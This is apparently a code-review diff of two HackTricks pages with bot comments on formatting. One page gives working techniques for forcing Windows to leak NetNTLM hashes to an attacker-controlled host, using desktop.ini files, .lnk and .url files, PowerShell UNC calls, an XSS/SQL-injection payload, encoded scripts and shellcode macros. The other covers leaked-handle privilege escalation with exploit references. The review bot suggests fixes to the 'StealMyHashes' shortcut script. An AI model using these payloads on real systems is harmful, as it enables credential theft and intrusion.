The desktop.ini files contain the information of the icons you have applied to the folder. We can abuse this to resolve a network path. Once you open the folder you should get the hashes.
|
The desktop.ini files contain the information of the icons you have applied to the folder. We can abuse this to resolve a network path. Once you open the folder you should get the hashes.
|
||||||
|
|
||||||
```text
|
```
|
||||||
mkdir openMe
|
mkdir openMe
|
||||||
attrib +s openMe
|
attrib +s openMe
|
||||||
cd openMe
|
cd openMe
|
||||||
|
@ -230,17 +227,17 @@ attrib +s +h desktop.ini
|
||||||
|
|
||||||
In Windows XP systems the desktop.ini file uses ‘IcondFile’ instead of ‘IconResource’.
|
In Windows XP systems the desktop.ini file uses ‘IcondFile’ instead of ‘IconResource’.
|
||||||
|
|
||||||
```text
|
```
|
||||||
[.ShellClassInfo]
|
[.ShellClassInfo]
|
||||||
IconFile=\\192.168.0.1\aa
|
IconFile=\\192.168.0.1\aa
|
||||||
IconIndex=1337
|
IconIndex=1337
|
||||||
```
|
```
|
||||||
|
|
||||||
# Shortcut Files \(.lnk\)
|
## Shortcut Files (.lnk)
|
||||||
|
|
||||||
We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory.
|
We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory.
|
||||||
|
|
||||||
```text
|
```
|
||||||
Set shl = CreateObject("WScript.Shell")
|
Set shl = CreateObject("WScript.Shell")
|
||||||
Set fso = CreateObject("Scripting.FileSystemObject")
|
Set fso = CreateObject("Scripting.FileSystemObject")
|
||||||
currentFolder = shl.CurrentDirectory
|
currentFolder = shl.CurrentDirectory
|
||||||
|
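Review bot: 'In Windows XP systems the desktop.ini file uses ‘IcondFile’ instead of ‘IconResource’' has a typo, `IcondFile` for `IconFile`, which is the key the code block beneath actually uses (`IconFile=\\192.168.0.1\aa`).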
@ -257,7 +254,7 @@ sc.Save
|
||||||
|
|
||||||
The Powershell version.
|
The Powershell version.
|
||||||
|
|
||||||
```text
|
```
|
||||||
$objShell = New-Object -ComObject WScript.Shell
|
$objShell = New-Object -ComObject WScript.Shell
|
||||||
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
|
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
|
||||||
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
|
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
|
||||||
|
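Review bot: `$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")` passes a relative path, and the WScript.Shell COM object resolves it against the process working directory, which in PowerShell is not kept in sync with `$PWD` (`cd` changes the provider location but not `[Environment]::CurrentDirectory`), so the `.lnk` can land somewhere other than the reader expects; pass an absolute path, e.g. `$objShell.CreateShortcut((Join-Path $PWD 'StealMyHashes.lnk'))`.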
@ -268,55 +265,53 @@ $lnk.HotKey = "Ctrl+Alt+O"
|
||||||
$lnk.Save()
|
$lnk.Save()
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/shortcut2.png?w=640)
|
## Internet Shortcuts (.url)
|
||||||
|
|
||||||
# Internet Shortcuts \(.url\)
|
|
||||||
|
|
||||||
Another shortcut in Windows is the Internet shortcuts. You can save this as something.url
|
Another shortcut in Windows is the Internet shortcuts. You can save this as something.url
|
||||||
|
|
||||||
```text
|
```
|
||||||
echo [InternetShortcut] > stealMyHashes.url
|
echo [InternetShortcut] > stealMyHashes.url
|
||||||
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
|
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
|
||||||
```
|
```
|
||||||
|
|
||||||
# Autorun with Registry
|
## Autorun with Registry
|
||||||
|
|
||||||
You can add a new registry key in any of the following paths.
|
You can add a new registry key in any of the following paths.
|
||||||
|
|
||||||
```text
|
```
|
||||||
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
|
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
|
||||||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
|
||||||
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||||||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/registry.png?w=640)
|
![](<../../.gitbook/assets/image (307).png>)
|
||||||
|
|
||||||
# Powershell
|
## Powershell
|
||||||
|
|
||||||
There are probably many scriptlets in Powershell that would resolve a network path.
|
There are probably many scriptlets in Powershell that would resolve a network path.
|
||||||
|
|
||||||
```text
|
```
|
||||||
Invoke-Item \\192.168.0.1\aa
|
Invoke-Item \\192.168.0.1\aa
|
||||||
Get-Content \\192.168.0.1\aa
|
Get-Content \\192.168.0.1\aa
|
||||||
Start-Process \\192.168.0.1\aa
|
Start-Process \\192.168.0.1\aa
|
||||||
```
|
```
|
||||||
|
|
||||||
# IE
|
## IE
|
||||||
|
|
||||||
IE will resolve UNC paths. For example
|
IE will resolve UNC paths. For example
|
||||||
|
|
||||||
```text
|
```
|
||||||
<img src="\\\\192.168.0.1\\aa">
|
<img src="\\\\192.168.0.1\\aa">
|
||||||
```
|
```
|
||||||
|
|
||||||
You can inject under XSS or in scenarios you find SQL injection. For example.
|
You can inject under XSS or in scenarios you find SQL injection. For example.
|
||||||
|
|
||||||
```text
|
```
|
||||||
http://host.tld/?id=-1' union select 1,'<img src="\\\\192.168.0.1\\aa">';%00
|
http://host.tld/?id=-1' union select 1,'<img src="\\\\192.168.0.1\\aa">';%00
|
||||||
```
|
```
|
||||||
|
|
||||||
# VBScript
|
## VBScript
|
||||||
|
|
||||||
You can save this as .vbs or can be used inside a macro that is applied to Word or Excel files.
|
You can save this as .vbs or can be used inside a macro that is applied to Word or Excel files.
|
||||||
|
|
||||||
|
@ -340,13 +335,13 @@ Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
|
||||||
|
|
||||||
Here’ the encoded version. You can encode and save this as something.vbe
|
Here’ the encoded version. You can encode and save this as something.vbe
|
||||||
|
|
||||||
```text
|
```
|
||||||
#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2 yczmCE~8#XSAAAA==^#~@
|
#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2 yczmCE~8#XSAAAA==^#~@
|
||||||
```
|
```
|
||||||
|
|
||||||
You can apply this in html files too. But only works with IE. You can save this as something.hta which will be an HTML Application under windows, which mshta.exe will execute it. By default it uses IE.
|
You can apply this in html files too. But only works with IE. You can save this as something.hta which will be an HTML Application under windows, which mshta.exe will execute it. By default it uses IE.
|
||||||
|
|
||||||
```text
|
```
|
||||||
<html>
|
<html>
|
||||||
<script type="text/Vbscript.Encode">
|
<script type="text/Vbscript.Encode">
|
||||||
<!--
|
<!--
|
||||||
|
@ -356,7 +351,7 @@ You can apply this in html files too. But only works with IE. You can save this
|
||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
# JScript
|
## JScript
|
||||||
|
|
||||||
You can save this as something.js under windows.
|
You can save this as something.js under windows.
|
||||||
|
|
||||||
|
@ -380,7 +375,7 @@ fso.FileExists("//192.168.0.103/aa")
|
||||||
|
|
||||||
Here’s the encoded version. You can save this as something.jse.
|
Here’s the encoded version. You can save this as something.jse.
|
||||||
|
|
||||||
```text
|
```
|
||||||
#@~^XAAAAA==-mD~6/K'xh,)mDk-+or8%mYvE?1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
|
#@~^XAAAAA==-mD~6/K'xh,)mDk-+or8%mYvE?1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -396,7 +391,7 @@ The html version of this.
|
||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
# Windows Script Files
|
## Windows Script Files
|
||||||
|
|
||||||
Save this as something.wsf.
|
Save this as something.wsf.
|
||||||
|
|
||||||
|
@ -411,11 +406,11 @@ Save this as something.wsf.
|
||||||
</package>
|
</package>
|
||||||
```
|
```
|
||||||
|
|
||||||
# Shellcode
|
## Shellcode
|
||||||
|
|
||||||
Here’s a small shellcode I made. This shellcode uses CreateFile and tries to read a non-existing network path. You can use tools such as Responder to capture NetNTLM hashes. The shellcode can be modified to steal hashes over the internet. SMBRelay attacks can also be performed.
|
Here’s a small shellcode I made. This shellcode uses CreateFile and tries to read a non-existing network path. You can use tools such as Responder to capture NetNTLM hashes. The shellcode can be modified to steal hashes over the internet. SMBRelay attacks can also be performed.
|
||||||
|
|
||||||
```text
|
```cpp
|
||||||
/*
|
/*
|
||||||
Title: CreateFile Shellcode
|
Title: CreateFile Shellcode
|
||||||
Author: Osanda Malith Jayathissa (@OsandaMalith)
|
Author: Osanda Malith Jayathissa (@OsandaMalith)
|
||||||
|
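Review bot: the shortcut2.png screenshot is dropped rather than replaced: the old `![](https://osandamalith.files.wordpress.com/2017/03/shortcut2.png?w=640)` line has no counterpart on the new side, whereas registry.png a few lines below is swapped for `![](<../../.gitbook/assets/image (307).png>)`. If the goal is to stop hot-linking the wordpress images, the shortcut screenshot needs a local asset too; otherwise the reader loses the picture of the resulting .lnk. Minor: the .url, registry, PowerShell, IE, SQL-injection and .vbe fences in this hunk also go from `text` to untagged while the shellcode fence gets `cpp`; either keep `text` or give them real tags. The typo `Here’ the encoded version` is in unchanged context and could be fixed while this region is being touched.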
@ -474,13 +469,11 @@ int main() {
|
||||||
|
|
||||||
[https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html](https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html)
|
[https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html](https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html)
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/overintenert1.png?w=640)
|
## Shellcode Inside Macros
|
||||||
|
|
||||||
# Shellcode Inside Macros
|
|
||||||
|
|
||||||
Here’s the above shellcode applied inside a Word/Excel macro. You can use the same code inside a VB6 application.
|
Here’s the above shellcode applied inside a Word/Excel macro. You can use the same code inside a VB6 application.
|
||||||
|
|
||||||
```text
|
```basic
|
||||||
' Author : Osanda Malith Jayathissa (@OsandaMalith)
|
' Author : Osanda Malith Jayathissa (@OsandaMalith)
|
||||||
' Title: Shellcode to request a non-existing network path
|
' Title: Shellcode to request a non-existing network path
|
||||||
' Website: https://osandamalith
|
' Website: https://osandamalith
|
||||||
|
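Review bot: the overintenert1.png screenshot, which illustrates the preceding paragraph's statement that the shellcode can be pointed at a host over the internet, is removed without a local replacement; the old `![](https://osandamalith.files.wordpress.com/2017/03/overintenert1.png?w=640)` line is simply overwritten by the `## Shellcode Inside Macros` heading. Re-add it as a .gitbook asset like the registry screenshot earlier in the commit. Also, `basic` is an imprecise tag for a Word/Excel macro; `vba`, which this commit already uses further down, matches the `' Author` / `End Sub` content better.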
@ -576,16 +569,16 @@ End Sub
|
||||||
|
|
||||||
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba)
|
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba)
|
||||||
|
|
||||||
# Shellcode Inside VBS and JS
|
## Shellcode Inside VBS and JS
|
||||||
|
|
||||||
subTee has done many kinds of research with JS and DynamicWrapperX. You can find a POC using the DynamicWrapperX DLL.
|
subTee has done many kinds of research with JS and DynamicWrapperX. You can find a POC using the DynamicWrapperX DLL.\
|
||||||
[http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html](http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html)
|
[http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html](http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html)\
|
||||||
Based on that I have ported the shellcode to JS and VBS. The fun part is we can embed shellcode in JScript or VBScript inside html and .hta formats.
|
Based on that I have ported the shellcode to JS and VBS. The fun part is we can embed shellcode in JScript or VBScript inside html and .hta formats.\
|
||||||
Note the following shellcode directs to my IP.
|
Note the following shellcode directs to my IP.
|
||||||
|
|
||||||
### JScript
|
#### JScript
|
||||||
|
|
||||||
```text
|
```javascript
|
||||||
/*
|
/*
|
||||||
* Author : Osanda Malith Jayathissa (@OsandaMalith)
|
* Author : Osanda Malith Jayathissa (@OsandaMalith)
|
||||||
* Title: Shellcode to request a non-existing network path
|
* Title: Shellcode to request a non-existing network path
|
||||||
|
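Review bot: the heading hierarchy skips a level here: `## Shellcode Inside VBS and JS` is directly followed by `#### JScript` (changed from `###`), so the sub-sections jump from h2 to h4. Since the rest of this commit shifts every heading down by exactly one level, `### JScript` is the consistent choice (and `### VBScript` in the next hunk). The trailing `\` appended to the three sentences above it is GitBook's hard line break and is fine as is.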
@ -629,9 +622,9 @@ var thread = DX.CreateThread(0,0,scLocation,0,0);
|
||||||
|
|
||||||
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js)
|
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js)
|
||||||
|
|
||||||
### VBScript
|
#### VBScript
|
||||||
|
|
||||||
```text
|
```vba
|
||||||
' Author : Osanda Malith Jayathissa (@OsandaMalith)
|
' Author : Osanda Malith Jayathissa (@OsandaMalith)
|
||||||
' Title: Shellcode to request a non-existing network path
|
' Title: Shellcode to request a non-existing network path
|
||||||
' Website: https://osandamalith.com
|
' Website: https://osandamalith.com
|
||||||
|
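Review bot: the new fence tag `vba` does not match the block, which is VBScript as its own heading says (the DynamicWrapperX port ending in `thread = DX.CreateThread (0,0,scLocation,0,0)`); `vb` or `vbscript` is the accurate tag, and whichever one is chosen should also be applied to the .vbs blocks earlier in the file that this commit leaves untagged, so the VBScript snippets are highlighted the same way throughout.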
@ -680,13 +673,11 @@ thread = DX.CreateThread (0,0,scLocation,0,0)
|
||||||
|
|
||||||
There might be many other ways in Windows. You never know! 🙂
|
There might be many other ways in Windows. You never know! 🙂
|
||||||
|
|
||||||
# References
|
## References
|
||||||
|
|
||||||
* [**https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/**](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
|
* [**https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/**](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
|
||||||
* [https://attack.mitre.org/techniques/T1187/](https://attack.mitre.org/techniques/T1187/)
|
* [https://attack.mitre.org/techniques/T1187/](https://attack.mitre.org/techniques/T1187/)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
@ -702,5 +693,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
|
# Leaked Handle Exploitation
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -16,21 +16,20 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## Introduction
|
||||||
# Introduction
|
|
||||||
|
|
||||||
Handles in a process allow to **access** different **Windows resources**:
|
Handles in a process allow to **access** different **Windows resources**:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (663).png>)
|
![](<../../.gitbook/assets/image (663) (1).png>)
|
||||||
|
|
||||||
There have been already several **privilege escalation** cases where a **privileged process** with **open and inheritable handles** have **run** an **unprivileged process** giving it **access to all those handles**.
|
There have been already several **privilege escalation** cases where a **privileged process** with **open and inheritable handles** have **run** an **unprivileged process** giving it **access to all those handles**.
|
||||||
|
|
||||||
For example, imagine that **a process running as SYSTEM open a new process** (`OpenProcess()`) with **full access**. The same process **also creates a new process** (`CreateProcess()`) **with low privileges but inheriting all the open handles of the main process**.\
|
For example, imagine that **a process running as SYSTEM open a new process** (`OpenProcess()`) with **full access**. The same process **also creates a new process** (`CreateProcess()`) **with low privileges but inheriting all the open handles of the main process**.\
|
||||||
Then, if you have **full access to the low privileged process**, you can grab the **open handle to the privileged process created** with `OpenProcess()` and **inject a shellcode**.
|
Then, if you have **full access to the low privileged process**, you can grab the **open handle to the privileged process created** with `OpenProcess()` and **inject a shellcode**.
|
||||||
|
|
||||||
# **Interesting Handles**
|
## **Interesting Handles**
|
||||||
|
|
||||||
## **Process**
|
### **Process**
|
||||||
|
|
||||||
As you read on the initial example if an **unprivileged process inherits a process handle** of a **privileged process** with enough permissions it will be able to execute **arbitrary code on it**.
|
As you read on the initial example if an **unprivileged process inherits a process handle** of a **privileged process** with enough permissions it will be able to execute **arbitrary code on it**.
|
||||||
|
|
||||||
|
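Review bot: `## **Interesting Handles**` and `### **Process**` keep bold markers inside the heading text, which is redundant in a heading and inconsistent with the sibling `### Thread` and `### File, Key & Section Handles` headings; drop the asterisks while the heading levels are being changed. Separately, the image reference moves from `image (663).png` to `image (663) (1).png`, which is GitBook's name for a duplicate upload; if the original asset is still in the repo it is now orphaned, so either point back at it or confirm the old file was removed.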
@ -42,7 +41,7 @@ In [**this excellent article**](http://dronesec.pw/blog/2019/08/22/exploiting-le
|
||||||
* PROCESS\_DUP\_HANDLE
|
* PROCESS\_DUP\_HANDLE
|
||||||
* PROCESS\_VM\_WRITE
|
* PROCESS\_VM\_WRITE
|
||||||
|
|
||||||
## Thread
|
### Thread
|
||||||
|
|
||||||
Similar to the process handles, if an **unprivileged process inherits a thread handle** of a **privileged process** with enough permissions it will be able to execute **arbitrary code on it**.
|
Similar to the process handles, if an **unprivileged process inherits a thread handle** of a **privileged process** with enough permissions it will be able to execute **arbitrary code on it**.
|
||||||
|
|
||||||
|
@ -52,15 +51,15 @@ In [**this excellent article**](http://dronesec.pw/blog/2019/08/22/exploiting-le
|
||||||
* THREAD\_DIRECT\_IMPERSONATION
|
* THREAD\_DIRECT\_IMPERSONATION
|
||||||
* THREAD\_SET\_CONTEXT
|
* THREAD\_SET\_CONTEXT
|
||||||
|
|
||||||
## File, Key & Section Handles
|
### File, Key & Section Handles
|
||||||
|
|
||||||
If an **unprivileged process inherits** a **handle** with **write** equivalent **permissions** over a **privileged file or registry**, it will be able to **overwrite** the file/registry (and with a lot of **luck**, **escalate privileged**).
|
If an **unprivileged process inherits** a **handle** with **write** equivalent **permissions** over a **privileged file or registry**, it will be able to **overwrite** the file/registry (and with a lot of **luck**, **escalate privileged**).
|
||||||
|
|
||||||
**Section Handles** are similar to file handles, the common name of this kinds of [objects is **"File Mapping"**](https://docs.microsoft.com/en-us/windows/win32/memory/file-mapping). They are used to work with **big files without keeping the entire** file in memory. That makes the exploitation kind of "similar" to the exploitation of a File Handle.
|
**Section Handles** are similar to file handles, the common name of this kinds of [objects is **"File Mapping"**](https://docs.microsoft.com/en-us/windows/win32/memory/file-mapping). They are used to work with **big files without keeping the entire** file in memory. That makes the exploitation kind of "similar" to the exploitation of a File Handle.
|
||||||
|
|
||||||
# How to see handles of processes
|
## How to see handles of processes
|
||||||
|
|
||||||
## Process Hacker
|
### Process Hacker
|
||||||
|
|
||||||
[**Process Hacker**](https://github.com/processhacker/processhacker) is a tool you can download for free. It has several amazing options to inspect processes and one of them is the **capability to see the handles of each process**.
|
[**Process Hacker**](https://github.com/processhacker/processhacker) is a tool you can download for free. It has several amazing options to inspect processes and one of them is the **capability to see the handles of each process**.
|
||||||
|
|
||||||
|
@ -74,17 +73,17 @@ You can then right click on the handle and **check the permissions**:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (628).png>)
|
![](<../../.gitbook/assets/image (628).png>)
|
||||||
|
|
||||||
## Sysinternals Handles
|
### Sysinternals Handles
|
||||||
|
|
||||||
The [**Handles** ](https://docs.microsoft.com/en-us/sysinternals/downloads/handle)binary from Sysinternals will also list the handles per process in the console:
|
The [**Handles** ](https://docs.microsoft.com/en-us/sysinternals/downloads/handle)binary from Sysinternals will also list the handles per process in the console:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (654).png>)
|
![](<../../.gitbook/assets/image (654).png>)
|
||||||
|
|
||||||
## LeakedHandlesFinder
|
### LeakedHandlesFinder
|
||||||
|
|
||||||
[**This tool**](https://github.com/lab52io/LeakedHandlesFinder) allows you to **monitor** leaked **handles** and even **autoexploit** them to escalate privileges.
|
[**This tool**](https://github.com/lab52io/LeakedHandlesFinder) allows you to **monitor** leaked **handles** and even **autoexploit** them to escalate privileges.
|
||||||
|
|
||||||
## Methodology
|
### Methodology
|
||||||
|
|
||||||
Now that you know how to find handles of processes what you need to check is if any **unprivileged process is having access to privileged handles**. In that case, the user of the process could be able to obtain the handle and abuse it to escalate privileges.
|
Now that you know how to find handles of processes what you need to check is if any **unprivileged process is having access to privileged handles**. In that case, the user of the process could be able to obtain the handle and abuse it to escalate privileges.
|
||||||
|
|
||||||
|
@ -96,7 +95,7 @@ handle64.exe /a | findstr /r /i "process thread file key pid:"
|
||||||
```
|
```
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
# Vulnerable Example
|
## Vulnerable Example
|
||||||
|
|
||||||
For example, the following code belongs to a **Windows service** that would be vulnerable. The vulnerable code of this service binary is located inside the **`Exploit`** function. This function is starts **creating a new handle process with full access**. Then, it's **creating a low privileged process** (by copying the low privileged token of _explorer.exe_) executing _C:\users\username\desktop\client.exe_. The **vulnerability resides in the fact it's creating the low privileged process with `bInheritHandles` as `TRUE`**.
|
For example, the following code belongs to a **Windows service** that would be vulnerable. The vulnerable code of this service binary is located inside the **`Exploit`** function. This function is starts **creating a new handle process with full access**. Then, it's **creating a low privileged process** (by copying the low privileged token of _explorer.exe_) executing _C:\users\username\desktop\client.exe_. The **vulnerability resides in the fact it's creating the low privileged process with `bInheritHandles` as `TRUE`**.
|
||||||
|
|
||||||
|
@ -308,7 +307,7 @@ int _tmain( int argc, TCHAR* argv[] )
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Exploit Example 1
|
### Exploit Example 1
|
||||||
|
|
||||||
{% hint style="info" %}
|
{% hint style="info" %}
|
||||||
In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
|
In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
|
||||||
|
@ -521,7 +520,7 @@ int main(int argc, char **argv) {
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Exploit Example 2
|
### Exploit Example 2
|
||||||
|
|
||||||
{% hint style="info" %}
|
{% hint style="info" %}
|
||||||
In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
|
In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
|
||||||
|
@ -692,7 +691,7 @@ int main(int argc, char **argv) {
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
# Other tools and examples
|
## Other tools and examples
|
||||||
|
|
||||||
* [**https://github.com/lab52io/LeakedHandlesFinder**](https://github.com/lab52io/LeakedHandlesFinder)
|
* [**https://github.com/lab52io/LeakedHandlesFinder**](https://github.com/lab52io/LeakedHandlesFinder)
|
||||||
|
|
||||||
|
@ -702,13 +701,12 @@ This tool allows you to monitor leaked handles to find vulnerable ones and even
|
||||||
|
|
||||||
Another tool to leak a handle and exploit it.
|
Another tool to leak a handle and exploit it.
|
||||||
|
|
||||||
# References
|
## References
|
||||||
|
|
||||||
* [http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)
|
* [http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)
|
||||||
* [https://github.com/lab52io/LeakedHandlesFinder](https://github.com/lab52io/LeakedHandlesFinder)
|
* [https://github.com/lab52io/LeakedHandlesFinder](https://github.com/lab52io/LeakedHandlesFinder)
|
||||||
* [https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html](https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html)
|
* [https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html](https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html)
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
@ -724,5 +722,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
|
|